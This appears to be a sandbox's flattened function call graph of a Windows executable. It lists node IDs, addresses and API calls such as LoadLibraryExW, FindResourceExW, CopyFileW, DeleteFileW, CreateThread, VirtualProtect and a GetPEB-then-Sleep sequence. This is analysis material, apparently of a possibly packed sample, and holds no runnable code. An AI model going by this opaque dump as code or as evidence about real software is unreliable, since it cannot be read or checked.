e20e35 VirtualProtect 97305 e20e03 97303->97305 97304->97303 97304->97305 97305->97255 97305->97256 97306->97264 97307->97264 97308->97259 97310 e09436 97309->97310 97311 e20f36 Mailbox 59 API calls 97310->97311 97312 e09444 97311->97312 97314 e09450 97312->97314 97358 e0935c 59 API calls Mailbox 97312->97358 97315 e091b0 97314->97315 97359 e092c0 97315->97359 97317 e091bf 97318 e20f36 Mailbox 59 API calls 97317->97318 97319 e0925b 97317->97319 97318->97319 97319->97273 97320 e08ea0 59 API calls Mailbox 97319->97320 97320->97267 97321->97273 97322->97273 97323->97273 97324->97244 97325->97273 97327 e5f4a4 __wsetenvp 97326->97327 97328 e5f4e3 97327->97328 97331 e5f4d9 97327->97331 97332 e5f58a 97327->97332 97328->97280 97328->97285 97331->97328 97351 e07a24 61 API calls 97331->97351 97332->97328 97352 e07a24 61 API calls 97332->97352 97334 e07a17 97333->97334 97335 e079ba 97333->97335 97336 e07e8c 59 API calls 97334->97336 97335->97334 97337 e079c5 97335->97337 97342 e079e8 _memmove 97336->97342 97338 e079e0 97337->97338 97339 e3ee62 97337->97339 97353 e08087 59 API calls Mailbox 97338->97353 97354 e08189 97339->97354 97342->97283 97343 e3ee6c 97344 e20f36 Mailbox 59 API calls 97343->97344 97345 e3ee8c 97344->97345 97347 e07ea3 _memmove 97346->97347 97348 e07e9a 97346->97348 97347->97285 97348->97347 97349 e07faf 59 API calls 97348->97349 97349->97347 97350->97286 97351->97331 97352->97332 97353->97342 97355 e20f36 Mailbox 59 API calls 97354->97355 97356 e08193 97355->97356 97356->97343 97357->97294 97358->97314 97360 e092c9 Mailbox 97359->97360 97361 e3f4f8 97360->97361 97366 e092d3 97360->97366 97362 e20f36 Mailbox 59 API calls 97361->97362 97364 e3f504 97362->97364 97363 e092da 97363->97317 97366->97363 97367 e09df0 59 API calls Mailbox 97366->97367 97367->97366 97583 e04d13 97368->97583 97373 e04f68 LoadLibraryExW 97593 e04cc8 97373->97593 97374 e3dc3f 97376 e04faa 84 API calls 97374->97376 97378 e3dc46 97376->97378 97380 e04cc8 3 API calls 97378->97380 97382 e3dc4e 97380->97382 97381 e04f8f 97381->97382 97383 e04f9b 97381->97383 97619 e0506b 97382->97619 97385 e04faa 84 API calls 97383->97385 97387 e04fa0 97385->97387 97387->97119 97387->97122 97389 e3dc75 97627 e05027 97389->97627 97393 e077c7 59 API calls 97392->97393 97394 e0470f 97393->97394 97395 e077c7 59 API calls 97394->97395 97396 e04717 97395->97396 97397 e077c7 59 API calls 97396->97397 97398 e0471f 97397->97398 97399 e077c7 59 API calls 97398->97399 97400 e04727 97399->97400 97401 e3d82b 97400->97401 97402 e0475b 97400->97402 97403 e081a7 59 API calls 97401->97403 97404 e079ab 59 API calls 97402->97404 97405 e3d834 97403->97405 97406 e04769 97404->97406 97802 e07eec 97405->97802 97408 e07e8c 59 API calls 97406->97408 97409 e04773 97408->97409 97411 e0479e 97409->97411 97412 e079ab 59 API calls 97409->97412 97410 e047de 97413 e079ab 59 API calls 97410->97413 97411->97410 97414 e047bd 97411->97414 97424 e3d854 97411->97424 97415 e04794 97412->97415 97417 e047ef 97413->97417 97416 e07b52 59 API calls 97414->97416 97419 e07e8c 59 API calls 97415->97419 97421 e047c7 97416->97421 97422 e04801 97417->97422 97425 e081a7 59 API calls 97417->97425 97418 e3d924 97420 e07d2c 59 API calls 97418->97420 97419->97411 97433 e3d8e1 97420->97433 97421->97410 97429 e079ab 59 API calls 97421->97429 97423 e04811 97422->97423 97426 e081a7 59 API calls 97422->97426 97428 e04818 97423->97428 97430 e081a7 59 API calls 97423->97430 97424->97418 97427 e3d90d 97424->97427 97440 e3d88b 97424->97440 97425->97422 97426->97423 97427->97418 97435 e3d8f8 97427->97435 97431 e0481f Mailbox 97428->97431 97432 e081a7 59 API calls 97428->97432 97429->97410 97430->97428 97431->97152 97432->97431 97433->97410 97434 e07b52 59 API calls 97433->97434 97806 e07a84 59 API calls 2 library calls 97433->97806 97434->97433 97438 e07d2c 59 API calls 97435->97438 97436 e3d8e9 97437 e07d2c 59 API calls 97436->97437 97437->97433 97438->97433 97440->97436 97441 e3d8d4 97440->97441 97442 e07d2c 59 API calls 97441->97442 97442->97433 97444 e07faf 59 API calls 97443->97444 97445 e07b5d 97444->97445 97445->97159 97445->97160 97447 e07ca0 97446->97447 97448 e3efc4 97446->97448 97807 e07bb1 97447->97807 97813 e57f03 59 API calls _memmove 97448->97813 97451 e07cac 97451->97167 97452 e3efce 97453 e081a7 59 API calls 97452->97453 97454 e3efd6 Mailbox 97453->97454 97456 e640ce 97455->97456 97457 e640d3 97456->97457 97458 e640e1 97456->97458 97459 e081a7 59 API calls 97457->97459 97460 e077c7 59 API calls 97458->97460 97508 e640dc Mailbox 97459->97508 97461 e640e9 97460->97461 97462 e077c7 59 API calls 97461->97462 97463 e640f1 97462->97463 97464 e077c7 59 API calls 97463->97464 97465 e640fc 97464->97465 97466 e077c7 59 API calls 97465->97466 97467 e64104 97466->97467 97468 e077c7 59 API calls 97467->97468 97469 e6410c 97468->97469 97470 e077c7 59 API calls 97469->97470 97471 e64114 97470->97471 97472 e077c7 59 API calls 97471->97472 97473 e6411c 97472->97473 97474 e077c7 59 API calls 97473->97474 97475 e64124 97474->97475 97476 e046f9 59 API calls 97475->97476 97477 e6413b 97476->97477 97478 e046f9 59 API calls 97477->97478 97479 e64154 97478->97479 97480 e07b52 59 API calls 97479->97480 97481 e64160 97480->97481 97482 e64173 97481->97482 97483 e07e8c 59 API calls 97481->97483 97484 e07b52 59 API calls 97482->97484 97483->97482 97485 e6417c 97484->97485 97486 e6418c 97485->97486 97487 e07e8c 59 API calls 97485->97487 97488 e081a7 59 API calls 97486->97488 97487->97486 97489 e64198 97488->97489 97490 e07c8e 59 API calls 97489->97490 97491 e641a4 97490->97491 97814 e64264 59 API calls 97491->97814 97493 e641b3 97815 e64264 59 API calls 97493->97815 97495 e641c6 97496 e07b52 59 API calls 97495->97496 97497 e641d0 97496->97497 97498 e641e7 97497->97498 97499 e641d5 97497->97499 97501 e07b52 59 API calls 97498->97501 97500 e07e0b 59 API calls 97499->97500 97502 e641e2 97500->97502 97503 e641f0 97501->97503 97505 e07c8e 59 API calls 97502->97505 97504 e6420e 97503->97504 97507 e07e0b 59 API calls 97503->97507 97506 e07c8e 59 API calls 97504->97506 97505->97504 97506->97508 97507->97502 97508->97176 97510 e6920b __ftell_nolock 97509->97510 97511 e20f36 Mailbox 59 API calls 97510->97511 97512 e69268 97511->97512 97513 e0538e 59 API calls 97512->97513 97514 e69272 97513->97514 97515 e69008 GetSystemTimeAsFileTime 97514->97515 97516 e6927d 97515->97516 97517 e05045 85 API calls 97516->97517 97518 e69290 _wcscmp 97517->97518 97519 e692b4 97518->97519 97520 e69361 97518->97520 97846 e697dd 97519->97846 97522 e697dd 96 API calls 97520->97522 97537 e6932d _wcscat 97522->97537 97525 e0506b 74 API calls 97527 e69386 97525->97527 97526 e6936a 97526->97182 97528 e0506b 74 API calls 97527->97528 97530 e69396 97528->97530 97529 e692e2 _wcscat _wcscpy 97853 e2426e 58 API calls __wsplitpath_helper 97529->97853 97531 e0506b 74 API calls 97530->97531 97533 e693b1 97531->97533 97534 e0506b 74 API calls 97533->97534 97535 e693c1 97534->97535 97536 e0506b 74 API calls 97535->97536 97538 e693dc 97536->97538 97537->97525 97537->97526 97539 e0506b 74 API calls 97538->97539 97540 e693ec 97539->97540 97541 e0506b 74 API calls 97540->97541 97542 e693fc 97541->97542 97543 e0506b 74 API calls 97542->97543 97544 e6940c 97543->97544 97816 e6998c GetTempPathW GetTempFileNameW 97544->97816 97546 e69418 97547 e253cb 115 API calls 97546->97547 97558 e69429 97547->97558 97548 e694e3 97830 e25516 97548->97830 97550 e694ee 97552 e694f4 DeleteFileW 97550->97552 97553 e69508 97550->97553 97551 e0506b 74 API calls 97551->97558 97552->97526 97554 e695ae CopyFileW 97553->97554 97559 e69512 _wcsncpy 97553->97559 97555 e695d6 DeleteFileW 97554->97555 97556 e695c4 DeleteFileW 97554->97556 97843 e6994b CreateFileW 97555->97843 97556->97526 97558->97526 97558->97548 97558->97551 97817 e249d3 97558->97817 97854 e68baf 116 API calls __fcloseall 97559->97854 97562 e69599 97562->97555 97563 e6959d DeleteFileW 97562->97563 97563->97526 97564->97109 97566 e3f0a3 97565->97566 97567 e07e1f 97565->97567 97569 e08189 59 API calls 97566->97569 98119 e07db0 97567->98119 97571 e3f0ae __wsetenvp _memmove 97569->97571 97570 e07e2a 97570->97143 97572->97145 97573->97156 97575 e07da5 97574->97575 97576 e07d38 __wsetenvp 97574->97576 97577 e07e8c 59 API calls 97575->97577 97579 e07d73 97576->97579 97580 e07d4e 97576->97580 97578 e07d56 _memmove 97577->97578 97578->97168 97582 e08189 59 API calls 97579->97582 98124 e08087 59 API calls Mailbox 97580->98124 97582->97578 97632 e04d61 97583->97632 97586 e04d53 97590 e253cb 97586->97590 97587 e04d4a FreeLibrary 97587->97586 97588 e04d61 2 API calls 97589 e04d3a 97588->97589 97589->97586 97589->97587 97636 e253e0 97590->97636 97592 e04f5c 97592->97373 97592->97374 97717 e04d94 97593->97717 97596 e04ced 97597 e04d08 97596->97597 97598 e04cff FreeLibrary 97596->97598 97600 e04dd0 97597->97600 97598->97597 97599 e04d94 2 API calls 97599->97596 97601 e20f36 Mailbox 59 API calls 97600->97601 97602 e04de5 97601->97602 97721 e0538e 97602->97721 97604 e04df1 _memmove 97605 e04e2c 97604->97605 97606 e04f21 97604->97606 97607 e04ee9 97604->97607 97608 e05027 69 API calls 97605->97608 97735 e699c4 95 API calls 97606->97735 97724 e04fe9 CreateStreamOnHGlobal 97607->97724 97616 e04e35 97608->97616 97611 e0506b 74 API calls 97611->97616 97612 e04ec9 97612->97381 97614 e3dc00 97615 e05045 85 API calls 97614->97615 97617 e3dc14 97615->97617 97616->97611 97616->97612 97616->97614 97730 e05045 97616->97730 97618 e0506b 74 API calls 97617->97618 97618->97612 97620 e3dd26 97619->97620 97621 e0507d 97619->97621 97759 e25752 97621->97759 97624 e691b2 97779 e69008 97624->97779 97626 e691c8 97626->97389 97628 e05036 97627->97628 97630 e3dce9 97627->97630 97784 e25dd0 97628->97784 97631 e0503e 97633 e04d2e 97632->97633 97634 e04d6a LoadLibraryA 97632->97634 97633->97588 97633->97589 97634->97633 97635 e04d7b GetProcAddress 97634->97635 97635->97633 97638 e253ec __setmode 97636->97638 97637 e253ff 97685 e28ca8 58 API calls __getptd_noexit 97637->97685 97638->97637 97640 e25430 97638->97640 97655 e30668 97640->97655 97641 e25404 97686 e28f36 9 API calls _W_expandtime 97641->97686 97644 e25435 97645 e2544b 97644->97645 97646 e2543e 97644->97646 97648 e25475 97645->97648 97649 e25455 97645->97649 97687 e28ca8 58 API calls __getptd_noexit 97646->97687 97670 e30787 97648->97670 97688 e28ca8 58 API calls __getptd_noexit 97649->97688 97654 e2540f @_EH4_CallFilterFunc@8 __setmode 97654->97592 97656 e30674 __setmode 97655->97656 97657 e29d8b __lock 58 API calls 97656->97657 97667 e30682 97657->97667 97658 e306fd 97695 e2899d 58 API calls 2 library calls 97658->97695 97659 e306f6 97690 e3077e 97659->97690 97662 e30773 __setmode 97662->97644 97663 e30704 97663->97659 97696 e29fab InitializeCriticalSectionAndSpinCount 97663->97696 97666 e29e13 __mtinitlocknum 58 API calls 97666->97667 97667->97658 97667->97659 97667->97666 97693 e26dcd 59 API calls __lock 97667->97693 97694 e26e37 LeaveCriticalSection LeaveCriticalSection _doexit 97667->97694 97668 e3072a EnterCriticalSection 97668->97659 97678 e307a7 __wopenfile 97670->97678 97671 e307c1 97701 e28ca8 58 API calls __getptd_noexit 97671->97701 97673 e307c6 97702 e28f36 9 API calls _W_expandtime 97673->97702 97675 e309df 97698 e38721 97675->97698 97676 e25480 97689 e254a2 LeaveCriticalSection LeaveCriticalSection _fprintf 97676->97689 97678->97671 97684 e3097c 97678->97684 97703 e2394b 60 API calls 3 library calls 97678->97703 97680 e30975 97680->97684 97704 e2394b 60 API calls 3 library calls 97680->97704 97682 e30994 97682->97684 97705 e2394b 60 API calls 3 library calls 97682->97705 97684->97671 97684->97675 97685->97641 97686->97654 97687->97654 97688->97654 97689->97654 97697 e29ef5 LeaveCriticalSection 97690->97697 97692 e30785 97692->97662 97693->97667 97694->97667 97695->97663 97696->97668 97697->97692 97706 e37f05 97698->97706 97700 e3873a 97700->97676 97701->97673 97702->97676 97703->97680 97704->97682 97705->97684 97707 e37f11 __setmode 97706->97707 97708 e37f27 97707->97708 97711 e37f5d 97707->97711 97709 e28ca8 __lseek_nolock 58 API calls 97708->97709 97710 e37f2c 97709->97710 97712 e28f36 _W_expandtime 9 API calls 97710->97712 97713 e37fce __wsopen_nolock 109 API calls 97711->97713 97716 e37f36 __setmode 97712->97716 97714 e37f79 97713->97714 97715 e37fa2 __wsopen_helper LeaveCriticalSection 97714->97715 97715->97716 97716->97700 97718 e04ce1 97717->97718 97719 e04d9d LoadLibraryA 97717->97719 97718->97596 97718->97599 97719->97718 97720 e04dae GetProcAddress 97719->97720 97720->97718 97722 e20f36 Mailbox 59 API calls 97721->97722 97723 e053a0 97722->97723 97723->97604 97725 e05020 97724->97725 97726 e05003 FindResourceExW 97724->97726 97725->97605 97726->97725 97727 e3dc8c LoadResource 97726->97727 97727->97725 97728 e3dca1 SizeofResource 97727->97728 97728->97725 97729 e3dcb5 LockResource 97728->97729 97729->97725 97731 e05054 97730->97731 97732 e3dd04 97730->97732 97736 e259bd 97731->97736 97734 e05062 97734->97616 97735->97605 97739 e259c9 __setmode 97736->97739 97737 e259db 97749 e28ca8 58 API calls __getptd_noexit 97737->97749 97738 e25a01 97751 e26d8e 97738->97751 97739->97737 97739->97738 97742 e259e0 97750 e28f36 9 API calls _W_expandtime 97742->97750 97746 e259eb __setmode 97746->97734 97747 e25a16 97758 e25a38 LeaveCriticalSection LeaveCriticalSection _fprintf 97747->97758 97749->97742 97750->97746 97752 e26dc0 EnterCriticalSection 97751->97752 97753 e26d9e 97751->97753 97755 e25a07 97752->97755 97753->97752 97754 e26da6 97753->97754 97756 e29d8b __lock 58 API calls 97754->97756 97757 e2592e 83 API calls 4 library calls 97755->97757 97756->97755 97757->97747 97758->97746 97762 e2576d 97759->97762 97761 e0508e 97761->97624 97764 e25779 __setmode 97762->97764 97763 e257b4 __setmode 97763->97761 97764->97763 97765 e2578f _memset 97764->97765 97766 e257bc 97764->97766 97775 e28ca8 58 API calls __getptd_noexit 97765->97775 97767 e26d8e __lock_file 59 API calls 97766->97767 97769 e257c2 97767->97769 97777 e2558d 72 API calls 7 library calls 97769->97777 97770 e257a9 97776 e28f36 9 API calls _W_expandtime 97770->97776 97773 e257d8 97778 e257f6 LeaveCriticalSection LeaveCriticalSection _fprintf 97773->97778 97775->97770 97776->97763 97777->97773 97778->97763 97782 e2537a GetSystemTimeAsFileTime 97779->97782 97781 e69017 97781->97626 97783 e253a8 __aulldiv 97782->97783 97783->97781 97785 e25ddc __setmode 97784->97785 97786 e25e03 97785->97786 97787 e25dee 97785->97787 97789 e26d8e __lock_file 59 API calls 97786->97789 97798 e28ca8 58 API calls __getptd_noexit 97787->97798 97791 e25e09 97789->97791 97790 e25df3 97799 e28f36 9 API calls _W_expandtime 97790->97799 97800 e25a40 67 API calls 7 library calls 97791->97800 97794 e25e14 97801 e25e34 LeaveCriticalSection LeaveCriticalSection _fprintf 97794->97801 97796 e25e26 97797 e25dfe __setmode 97796->97797 97797->97631 97798->97790 97799->97797 97800->97794 97801->97796 97803 e07f06 97802->97803 97805 e07ef9 97802->97805 97804 e20f36 Mailbox 59 API calls 97803->97804 97804->97805 97805->97411 97806->97433 97808 e07bbf 97807->97808 97809 e07be5 _memmove 97807->97809 97808->97809 97810 e20f36 Mailbox 59 API calls 97808->97810 97809->97451 97811 e07c34 97810->97811 97812 e20f36 Mailbox 59 API calls 97811->97812 97812->97809 97813->97452 97814->97493 97815->97495 97816->97546 97818 e249df __setmode 97817->97818 97819 e24a15 97818->97819 97820 e249fd 97818->97820 97821 e24a0d __setmode 97818->97821 97822 e26d8e __lock_file 59 API calls 97819->97822 97867 e28ca8 58 API calls __getptd_noexit 97820->97867 97821->97558 97824 e24a1b 97822->97824 97855 e2487a 97824->97855 97825 e24a02 97868 e28f36 9 API calls _W_expandtime 97825->97868 97831 e25522 __setmode 97830->97831 97832 e25536 97831->97832 97833 e2554e 97831->97833 98046 e28ca8 58 API calls __getptd_noexit 97832->98046 97835 e26d8e __lock_file 59 API calls 97833->97835 97840 e25546 __setmode 97833->97840 97837 e25560 97835->97837 97836 e2553b 98047 e28f36 9 API calls _W_expandtime 97836->98047 98030 e254aa 97837->98030 97840->97550 97844 e69987 97843->97844 97845 e69971 SetFileTime CloseHandle 97843->97845 97844->97526 97845->97844 97848 e697f1 __tzset_nolock _wcscmp 97846->97848 97847 e691b2 GetSystemTimeAsFileTime 97847->97848 97848->97847 97849 e0506b 74 API calls 97848->97849 97850 e692b9 97848->97850 97851 e05045 85 API calls 97848->97851 97849->97848 97850->97526 97852 e2426e 58 API calls __wsplitpath_helper 97850->97852 97851->97848 97852->97529 97853->97537 97854->97562 97858 e24889 97855->97858 97861 e248a7 97855->97861 97856 e24897 97905 e28ca8 58 API calls __getptd_noexit 97856->97905 97858->97856 97858->97861 97865 e248c1 _memmove 97858->97865 97859 e2489c 97906 e28f36 9 API calls _W_expandtime 97859->97906 97869 e24a4d LeaveCriticalSection LeaveCriticalSection _fprintf 97861->97869 97865->97861 97870 e24856 97865->97870 97877 e2da06 97865->97877 97907 e24bad 97865->97907 97913 e2af9e 78 API calls 7 library calls 97865->97913 97867->97825 97868->97821 97869->97821 97871 e24860 97870->97871 97872 e24875 97870->97872 97914 e28ca8 58 API calls __getptd_noexit 97871->97914 97872->97865 97874 e24865 97915 e28f36 9 API calls _W_expandtime 97874->97915 97878 e2da12 __setmode 97877->97878 97879 e2da36 97878->97879 97880 e2da1f 97878->97880 97882 e2dad5 97879->97882 97884 e2da4a 97879->97884 97989 e28c74 58 API calls __getptd_noexit 97880->97989 97995 e28c74 58 API calls __getptd_noexit 97882->97995 97883 e2da24 97887 e2da72 97884->97887 97888 e2da68 97884->97888 97905->97859 97906->97861 97908 e24bc0 97907->97908 97909 e24be4 97907->97909 97908->97909 97910 e24856 __flush 58 API calls 97908->97910 97909->97865 97911 e24bdd 97910->97911 97912 e2da06 __write 78 API calls 97911->97912 97912->97909 97913->97865 97914->97874 97989->97883 98031 e254b9 98030->98031 98032 e254cd 98030->98032 98079 e28ca8 58 API calls __getptd_noexit 98031->98079 98034 e254c9 98032->98034 98036 e24bad __flush 78 API calls 98032->98036 98048 e25585 LeaveCriticalSection LeaveCriticalSection _fprintf 98034->98048 98035 e254be 98080 e28f36 9 API calls _W_expandtime 98035->98080 98038 e254d9 98036->98038 98049 e30cf7 98038->98049 98041 e24856 __flush 58 API calls 98046->97836 98047->97840 98048->97840 98050 e254e1 98049->98050 98051 e30d04 98049->98051 98050->98041 98051->98050 98052 e22ed5 _free 58 API calls 98051->98052 98052->98050 98079->98035 98080->98034 98120 e07dbf __wsetenvp 98119->98120 98121 e08189 59 API calls 98120->98121 98122 e07dd0 _memmove 98120->98122 98123 e3f060 _memmove 98121->98123 98122->97570 98124->97578 98126 e63c82 98125->98126 98127 e644b6 FindFirstFileW 98125->98127 98126->96954 98127->98126 98128 e644cb FindClose 98127->98128 98128->98126 98129->97228 98130->97200 98131->97215 98132->97210 98133->97216 98134->97226 98135->97229 98136->97233 98137->96974 98138->96972 98139->96863 98140->96863 98141->96861 98142->96862 98143->96866 98144->96862 98145->96887 98146 e01066 98151 e0f8cf 98146->98151 98148 e0106c 98149 e22ec0 __cinit 67 API calls 98148->98149 98150 e01076 98149->98150 98152 e0f8f0 98151->98152 98184 e20083 98152->98184 98156 e0f937 98157 e077c7 59 API calls 98156->98157 98158 e0f941 98157->98158 98159 e077c7 59 API calls 98158->98159 98160 e0f94b 98159->98160 98161 e077c7 59 API calls 98160->98161 98162 e0f955 98161->98162 98163 e077c7 59 API calls 98162->98163 98164 e0f993 98163->98164 98165 e077c7 59 API calls 98164->98165 98166 e0fa5e 98165->98166 98194 e160e7 98166->98194 98170 e0fa90 98171 e077c7 59 API calls 98170->98171 98172 e0fa9a 98171->98172 98222 e1ff1e 98172->98222 98174 e0fae1 98175 e0faf1 GetStdHandle 98174->98175 98176 e44904 98175->98176 98177 e0fb3d 98175->98177 98176->98177 98179 e4490d 98176->98179 98178 e0fb45 OleInitialize 98177->98178 98178->98148 98229 e66be1 64 API calls Mailbox 98179->98229 98181 e44914 98230 e672b0 CreateThread 98181->98230 98183 e44920 CloseHandle 98183->98178 98231 e2015c 98184->98231 98187 e2015c 59 API calls 98188 e200c5 98187->98188 98189 e077c7 59 API calls 98188->98189 98190 e200d1 98189->98190 98191 e07d2c 59 API calls 98190->98191 98192 e0f8f6 98191->98192 98193 e202e2 6 API calls 98192->98193 98193->98156 98195 e077c7 59 API calls 98194->98195 98196 e160f7 98195->98196 98197 e077c7 59 API calls 98196->98197 98198 e160ff 98197->98198 98238 e15bfd 98198->98238 98201 e15bfd 59 API calls 98202 e1610f 98201->98202 98203 e077c7 59 API calls 98202->98203 98204 e1611a 98203->98204 98205 e20f36 Mailbox 59 API calls 98204->98205 98206 e0fa68 98205->98206 98207 e16259 98206->98207 98208 e16267 98207->98208 98209 e077c7 59 API calls 98208->98209 98210 e16272 98209->98210 98211 e077c7 59 API calls 98210->98211 98212 e1627d 98211->98212 98213 e077c7 59 API calls 98212->98213 98214 e16288 98213->98214 98215 e077c7 59 API calls 98214->98215 98216 e16293 98215->98216 98217 e15bfd 59 API calls 98216->98217 98218 e1629e 98217->98218 98219 e20f36 Mailbox 59 API calls 98218->98219 98220 e162a5 RegisterWindowMessageW 98219->98220 98220->98170 98223 e55ac5 98222->98223 98224 e1ff2e 98222->98224 98241 e69b90 60 API calls 98223->98241 98225 e20f36 Mailbox 59 API calls 98224->98225 98227 e1ff36 98225->98227 98227->98174 98228 e55ad0 98229->98181 98230->98183 98242 e67296 65 API calls 98230->98242 98232 e077c7 59 API calls 98231->98232 98233 e20167 98232->98233 98234 e077c7 59 API calls 98233->98234 98235 e2016f 98234->98235 98236 e077c7 59 API calls 98235->98236 98237 e200bb 98236->98237 98237->98187 98239 e077c7 59 API calls 98238->98239 98240 e15c05 98239->98240 98240->98201 98241->98228 98243 fe9b98 98257 fe77e8 98243->98257 98245 fe9c62 98260 fe9a88 98245->98260 98263 feac88 GetPEB 98257->98263 98259 fe7e73 98259->98245 98261 fe9a91 Sleep 98260->98261 98262 fe9a9f 98261->98262 98264 feacb2 98263->98264 98264->98259 98265 e0e70b 98268 e0d260 98265->98268 98267 e0e719 98269 e0d27d 98268->98269 98298 e0d4dd 98268->98298 98270 e42a39 98269->98270 98271 e429ea 98269->98271 98292 e0d2a4 98269->98292 98312 e7a4fb 341 API calls __cinit 98270->98312 98272 e429ed 98271->98272 98282 e42a08 98271->98282 98275 e429f9 98272->98275 98272->98292 98310 e7ab0f 341 API calls 98275->98310 98278 e22ec0 __cinit 67 API calls 98278->98292 98279 e42c0e 98279->98279 98280 e0d594 98304 e08bb2 68 API calls 98280->98304 98281 e0d6ab 98281->98267 98282->98298 98311 e7afb7 341 API calls 3 library calls 98282->98311 98286 e42b55 98316 e7a866 89 API calls 98286->98316 98287 e0d5a3 98287->98267 98290 e08620 69 API calls 98290->98292 98292->98278 98292->98280 98292->98281 98292->98286 98292->98290 98292->98298 98299 e0a000 341 API calls 98292->98299 98300 e081a7 59 API calls 98292->98300 98302 e088a0 68 API calls __cinit 98292->98302 98303 e086a2 68 API calls 98292->98303 98305 e0859a 68 API calls 98292->98305 98306 e0d0dc 341 API calls 98292->98306 98307 e09f3a 59 API calls Mailbox 98292->98307 98308 e0d060 89 API calls 98292->98308 98309 e0cedd 341 API calls 98292->98309 98313 e08bb2 68 API calls 98292->98313 98314 e09e9c 60 API calls Mailbox 98292->98314 98315 e56ae3 60 API calls 98292->98315 98298->98281 98317 e69ed4 89 API calls 4 library calls 98298->98317 98299->98292 98300->98292 98302->98292 98303->98292 98304->98287 98305->98292 98306->98292 98307->98292 98308->98292 98309->98292 98310->98281 98311->98298 98312->98292 98313->98292 98314->98292 98315->98292 98316->98298 98317->98279 98318 e444c8 98322 e5625a 98318->98322 98320 e444d3 98321 e5625a 85 API calls 98320->98321 98321->98320 98328 e56294 98322->98328 98330 e56267 98322->98330 98323 e56296 98334 e09488 84 API calls Mailbox 98323->98334 98324 e5629b 98326 e09997 84 API calls 98324->98326 98327 e562a2 98326->98327 98329 e07c8e 59 API calls 98327->98329 98328->98320 98329->98328 98330->98323 98330->98324 98330->98328 98331 e5628e 98330->98331 98333 e09700 59 API calls _wcsstr 98331->98333 98333->98328 98334->98324 98335 e0e5ec 98338 e0ce1a 98335->98338 98337 e0e5f8 98339 e0ce32 98338->98339 98340 e0ce86 98338->98340 98339->98340 98341 e0a000 341 API calls 98339->98341 98344 e0ceaf 98340->98344 98348 e69ed4 89 API calls 4 library calls 98340->98348 98345 e0ce69 98341->98345 98343 e42915 98343->98343 98344->98337 98345->98344 98347 e09e9c 60 API calls Mailbox 98345->98347 98347->98340 98348->98343 98349 e27dd3 98350 e27ddf __setmode 98349->98350 98386 e29f88 GetStartupInfoW 98350->98386 98353 e27de4 98388 e28cfc GetProcessHeap 98353->98388 98354 e27e3c 98355 e27e47 98354->98355 98471 e27f23 58 API calls 3 library calls 98354->98471 98389 e29c66 98355->98389 98358 e27e4d 98359 e27e58 __RTC_Initialize 98358->98359 98472 e27f23 58 API calls 3 library calls 98358->98472 98410 e2d752 98359->98410 98362 e27e67 98363 e27e73 GetCommandLineW 98362->98363 98473 e27f23 58 API calls 3 library calls 98362->98473 98429 e350a3 GetEnvironmentStringsW 98363->98429 98366 e27e72 98366->98363 98369 e27e8d 98370 e27e98 98369->98370 98474 e23235 58 API calls 3 library calls 98369->98474 98439 e34ed8 98370->98439 98373 e27e9e 98374 e27ea9 98373->98374 98475 e23235 58 API calls 3 library calls 98373->98475 98453 e2326f 98374->98453 98377 e27eb1 98378 e27ebc __wwincmdln 98377->98378 98476 e23235 58 API calls 3 library calls 98377->98476 98459 e0492e 98378->98459 98381 e27ed0 98382 e27edf 98381->98382 98477 e234d8 58 API calls _doexit 98381->98477 98478 e23260 58 API calls _doexit 98382->98478 98385 e27ee4 __setmode 98387 e29f9e 98386->98387 98387->98353 98388->98354 98479 e23307 36 API calls 2 library calls 98389->98479 98391 e29c6b 98480 e29ebc InitializeCriticalSectionAndSpinCount __alloc_osfhnd 98391->98480 98393 e29c70 98394 e29c74 98393->98394 98482 e29f0a TlsAlloc 98393->98482 98481 e29cdc 61 API calls 2 library calls 98394->98481 98397 e29c86 98397->98394 98399 e29c91 98397->98399 98398 e29c79 98398->98358 98483 e28955 98399->98483 98402 e29cd3 98491 e29cdc 61 API calls 2 library calls 98402->98491 98405 e29cb2 98405->98402 98407 e29cb8 98405->98407 98406 e29cd8 98406->98358 98490 e29bb3 58 API calls 4 library calls 98407->98490 98409 e29cc0 GetCurrentThreadId 98409->98358 98411 e2d75e __setmode 98410->98411 98412 e29d8b __lock 58 API calls 98411->98412 98413 e2d765 98412->98413 98414 e28955 __calloc_crt 58 API calls 98413->98414 98415 e2d776 98414->98415 98416 e2d7e1 GetStartupInfoW 98415->98416 98417 e2d781 @_EH4_CallFilterFunc@8 __setmode 98415->98417 98423 e2d7f6 98416->98423 98426 e2d925 98416->98426 98417->98362 98418 e2d9ed 98505 e2d9fd LeaveCriticalSection _doexit 98418->98505 98420 e28955 __calloc_crt 58 API calls 98420->98423 98421 e2d972 GetStdHandle 98421->98426 98422 e2d985 GetFileType 98422->98426 98423->98420 98424 e2d844 98423->98424 98423->98426 98425 e2d878 GetFileType 98424->98425 98424->98426 98503 e29fab InitializeCriticalSectionAndSpinCount 98424->98503 98425->98424 98426->98418 98426->98421 98426->98422 98504 e29fab InitializeCriticalSectionAndSpinCount 98426->98504 98430 e27e83 98429->98430 98431 e350b4 98429->98431 98435 e34c9b GetModuleFileNameW 98430->98435 98506 e2899d 58 API calls 2 library calls 98431->98506 98433 e350da _memmove 98434 e350f0 FreeEnvironmentStringsW 98433->98434 98434->98430 98437 e34ccf _wparse_cmdline 98435->98437 98436 e34d0f _wparse_cmdline 98436->98369 98437->98436 98507 e2899d 58 API calls 2 library calls 98437->98507 98440 e34ef1 __wsetenvp 98439->98440 98441 e34ee9 98439->98441 98442 e28955 __calloc_crt 58 API calls 98440->98442 98441->98373 98443 e34f1a __wsetenvp 98442->98443 98443->98441 98445 e28955 __calloc_crt 58 API calls 98443->98445 98446 e34f71 98443->98446 98447 e34f96 98443->98447 98450 e34fad 98443->98450 98508 e34787 58 API calls 2 library calls 98443->98508 98444 e22ed5 _free 58 API calls 98444->98441 98445->98443 98446->98444 98448 e22ed5 _free 58 API calls 98447->98448 98448->98441 98509 e28f46 IsProcessorFeaturePresent 98450->98509 98452 e34fb9 98452->98373 98454 e2327b __IsNonwritableInCurrentImage 98453->98454 98524 e2a651 98454->98524 98456 e23299 __initterm_e 98457 e22ec0 __cinit 67 API calls 98456->98457 98458 e232b8 _doexit __IsNonwritableInCurrentImage 98456->98458 98457->98458 98458->98377 98460 e04948 98459->98460 98470 e049e7 98459->98470 98461 e04982 IsThemeActive 98460->98461 98527 e234ec 98461->98527 98465 e049ae 98539 e04a5b SystemParametersInfoW SystemParametersInfoW 98465->98539 98467 e049ba 98540 e03b4c 98467->98540 98469 e049c2 SystemParametersInfoW 98469->98470 98470->98381 98471->98355 98472->98359 98473->98366 98477->98382 98478->98385 98479->98391 98480->98393 98481->98398 98482->98397 98485 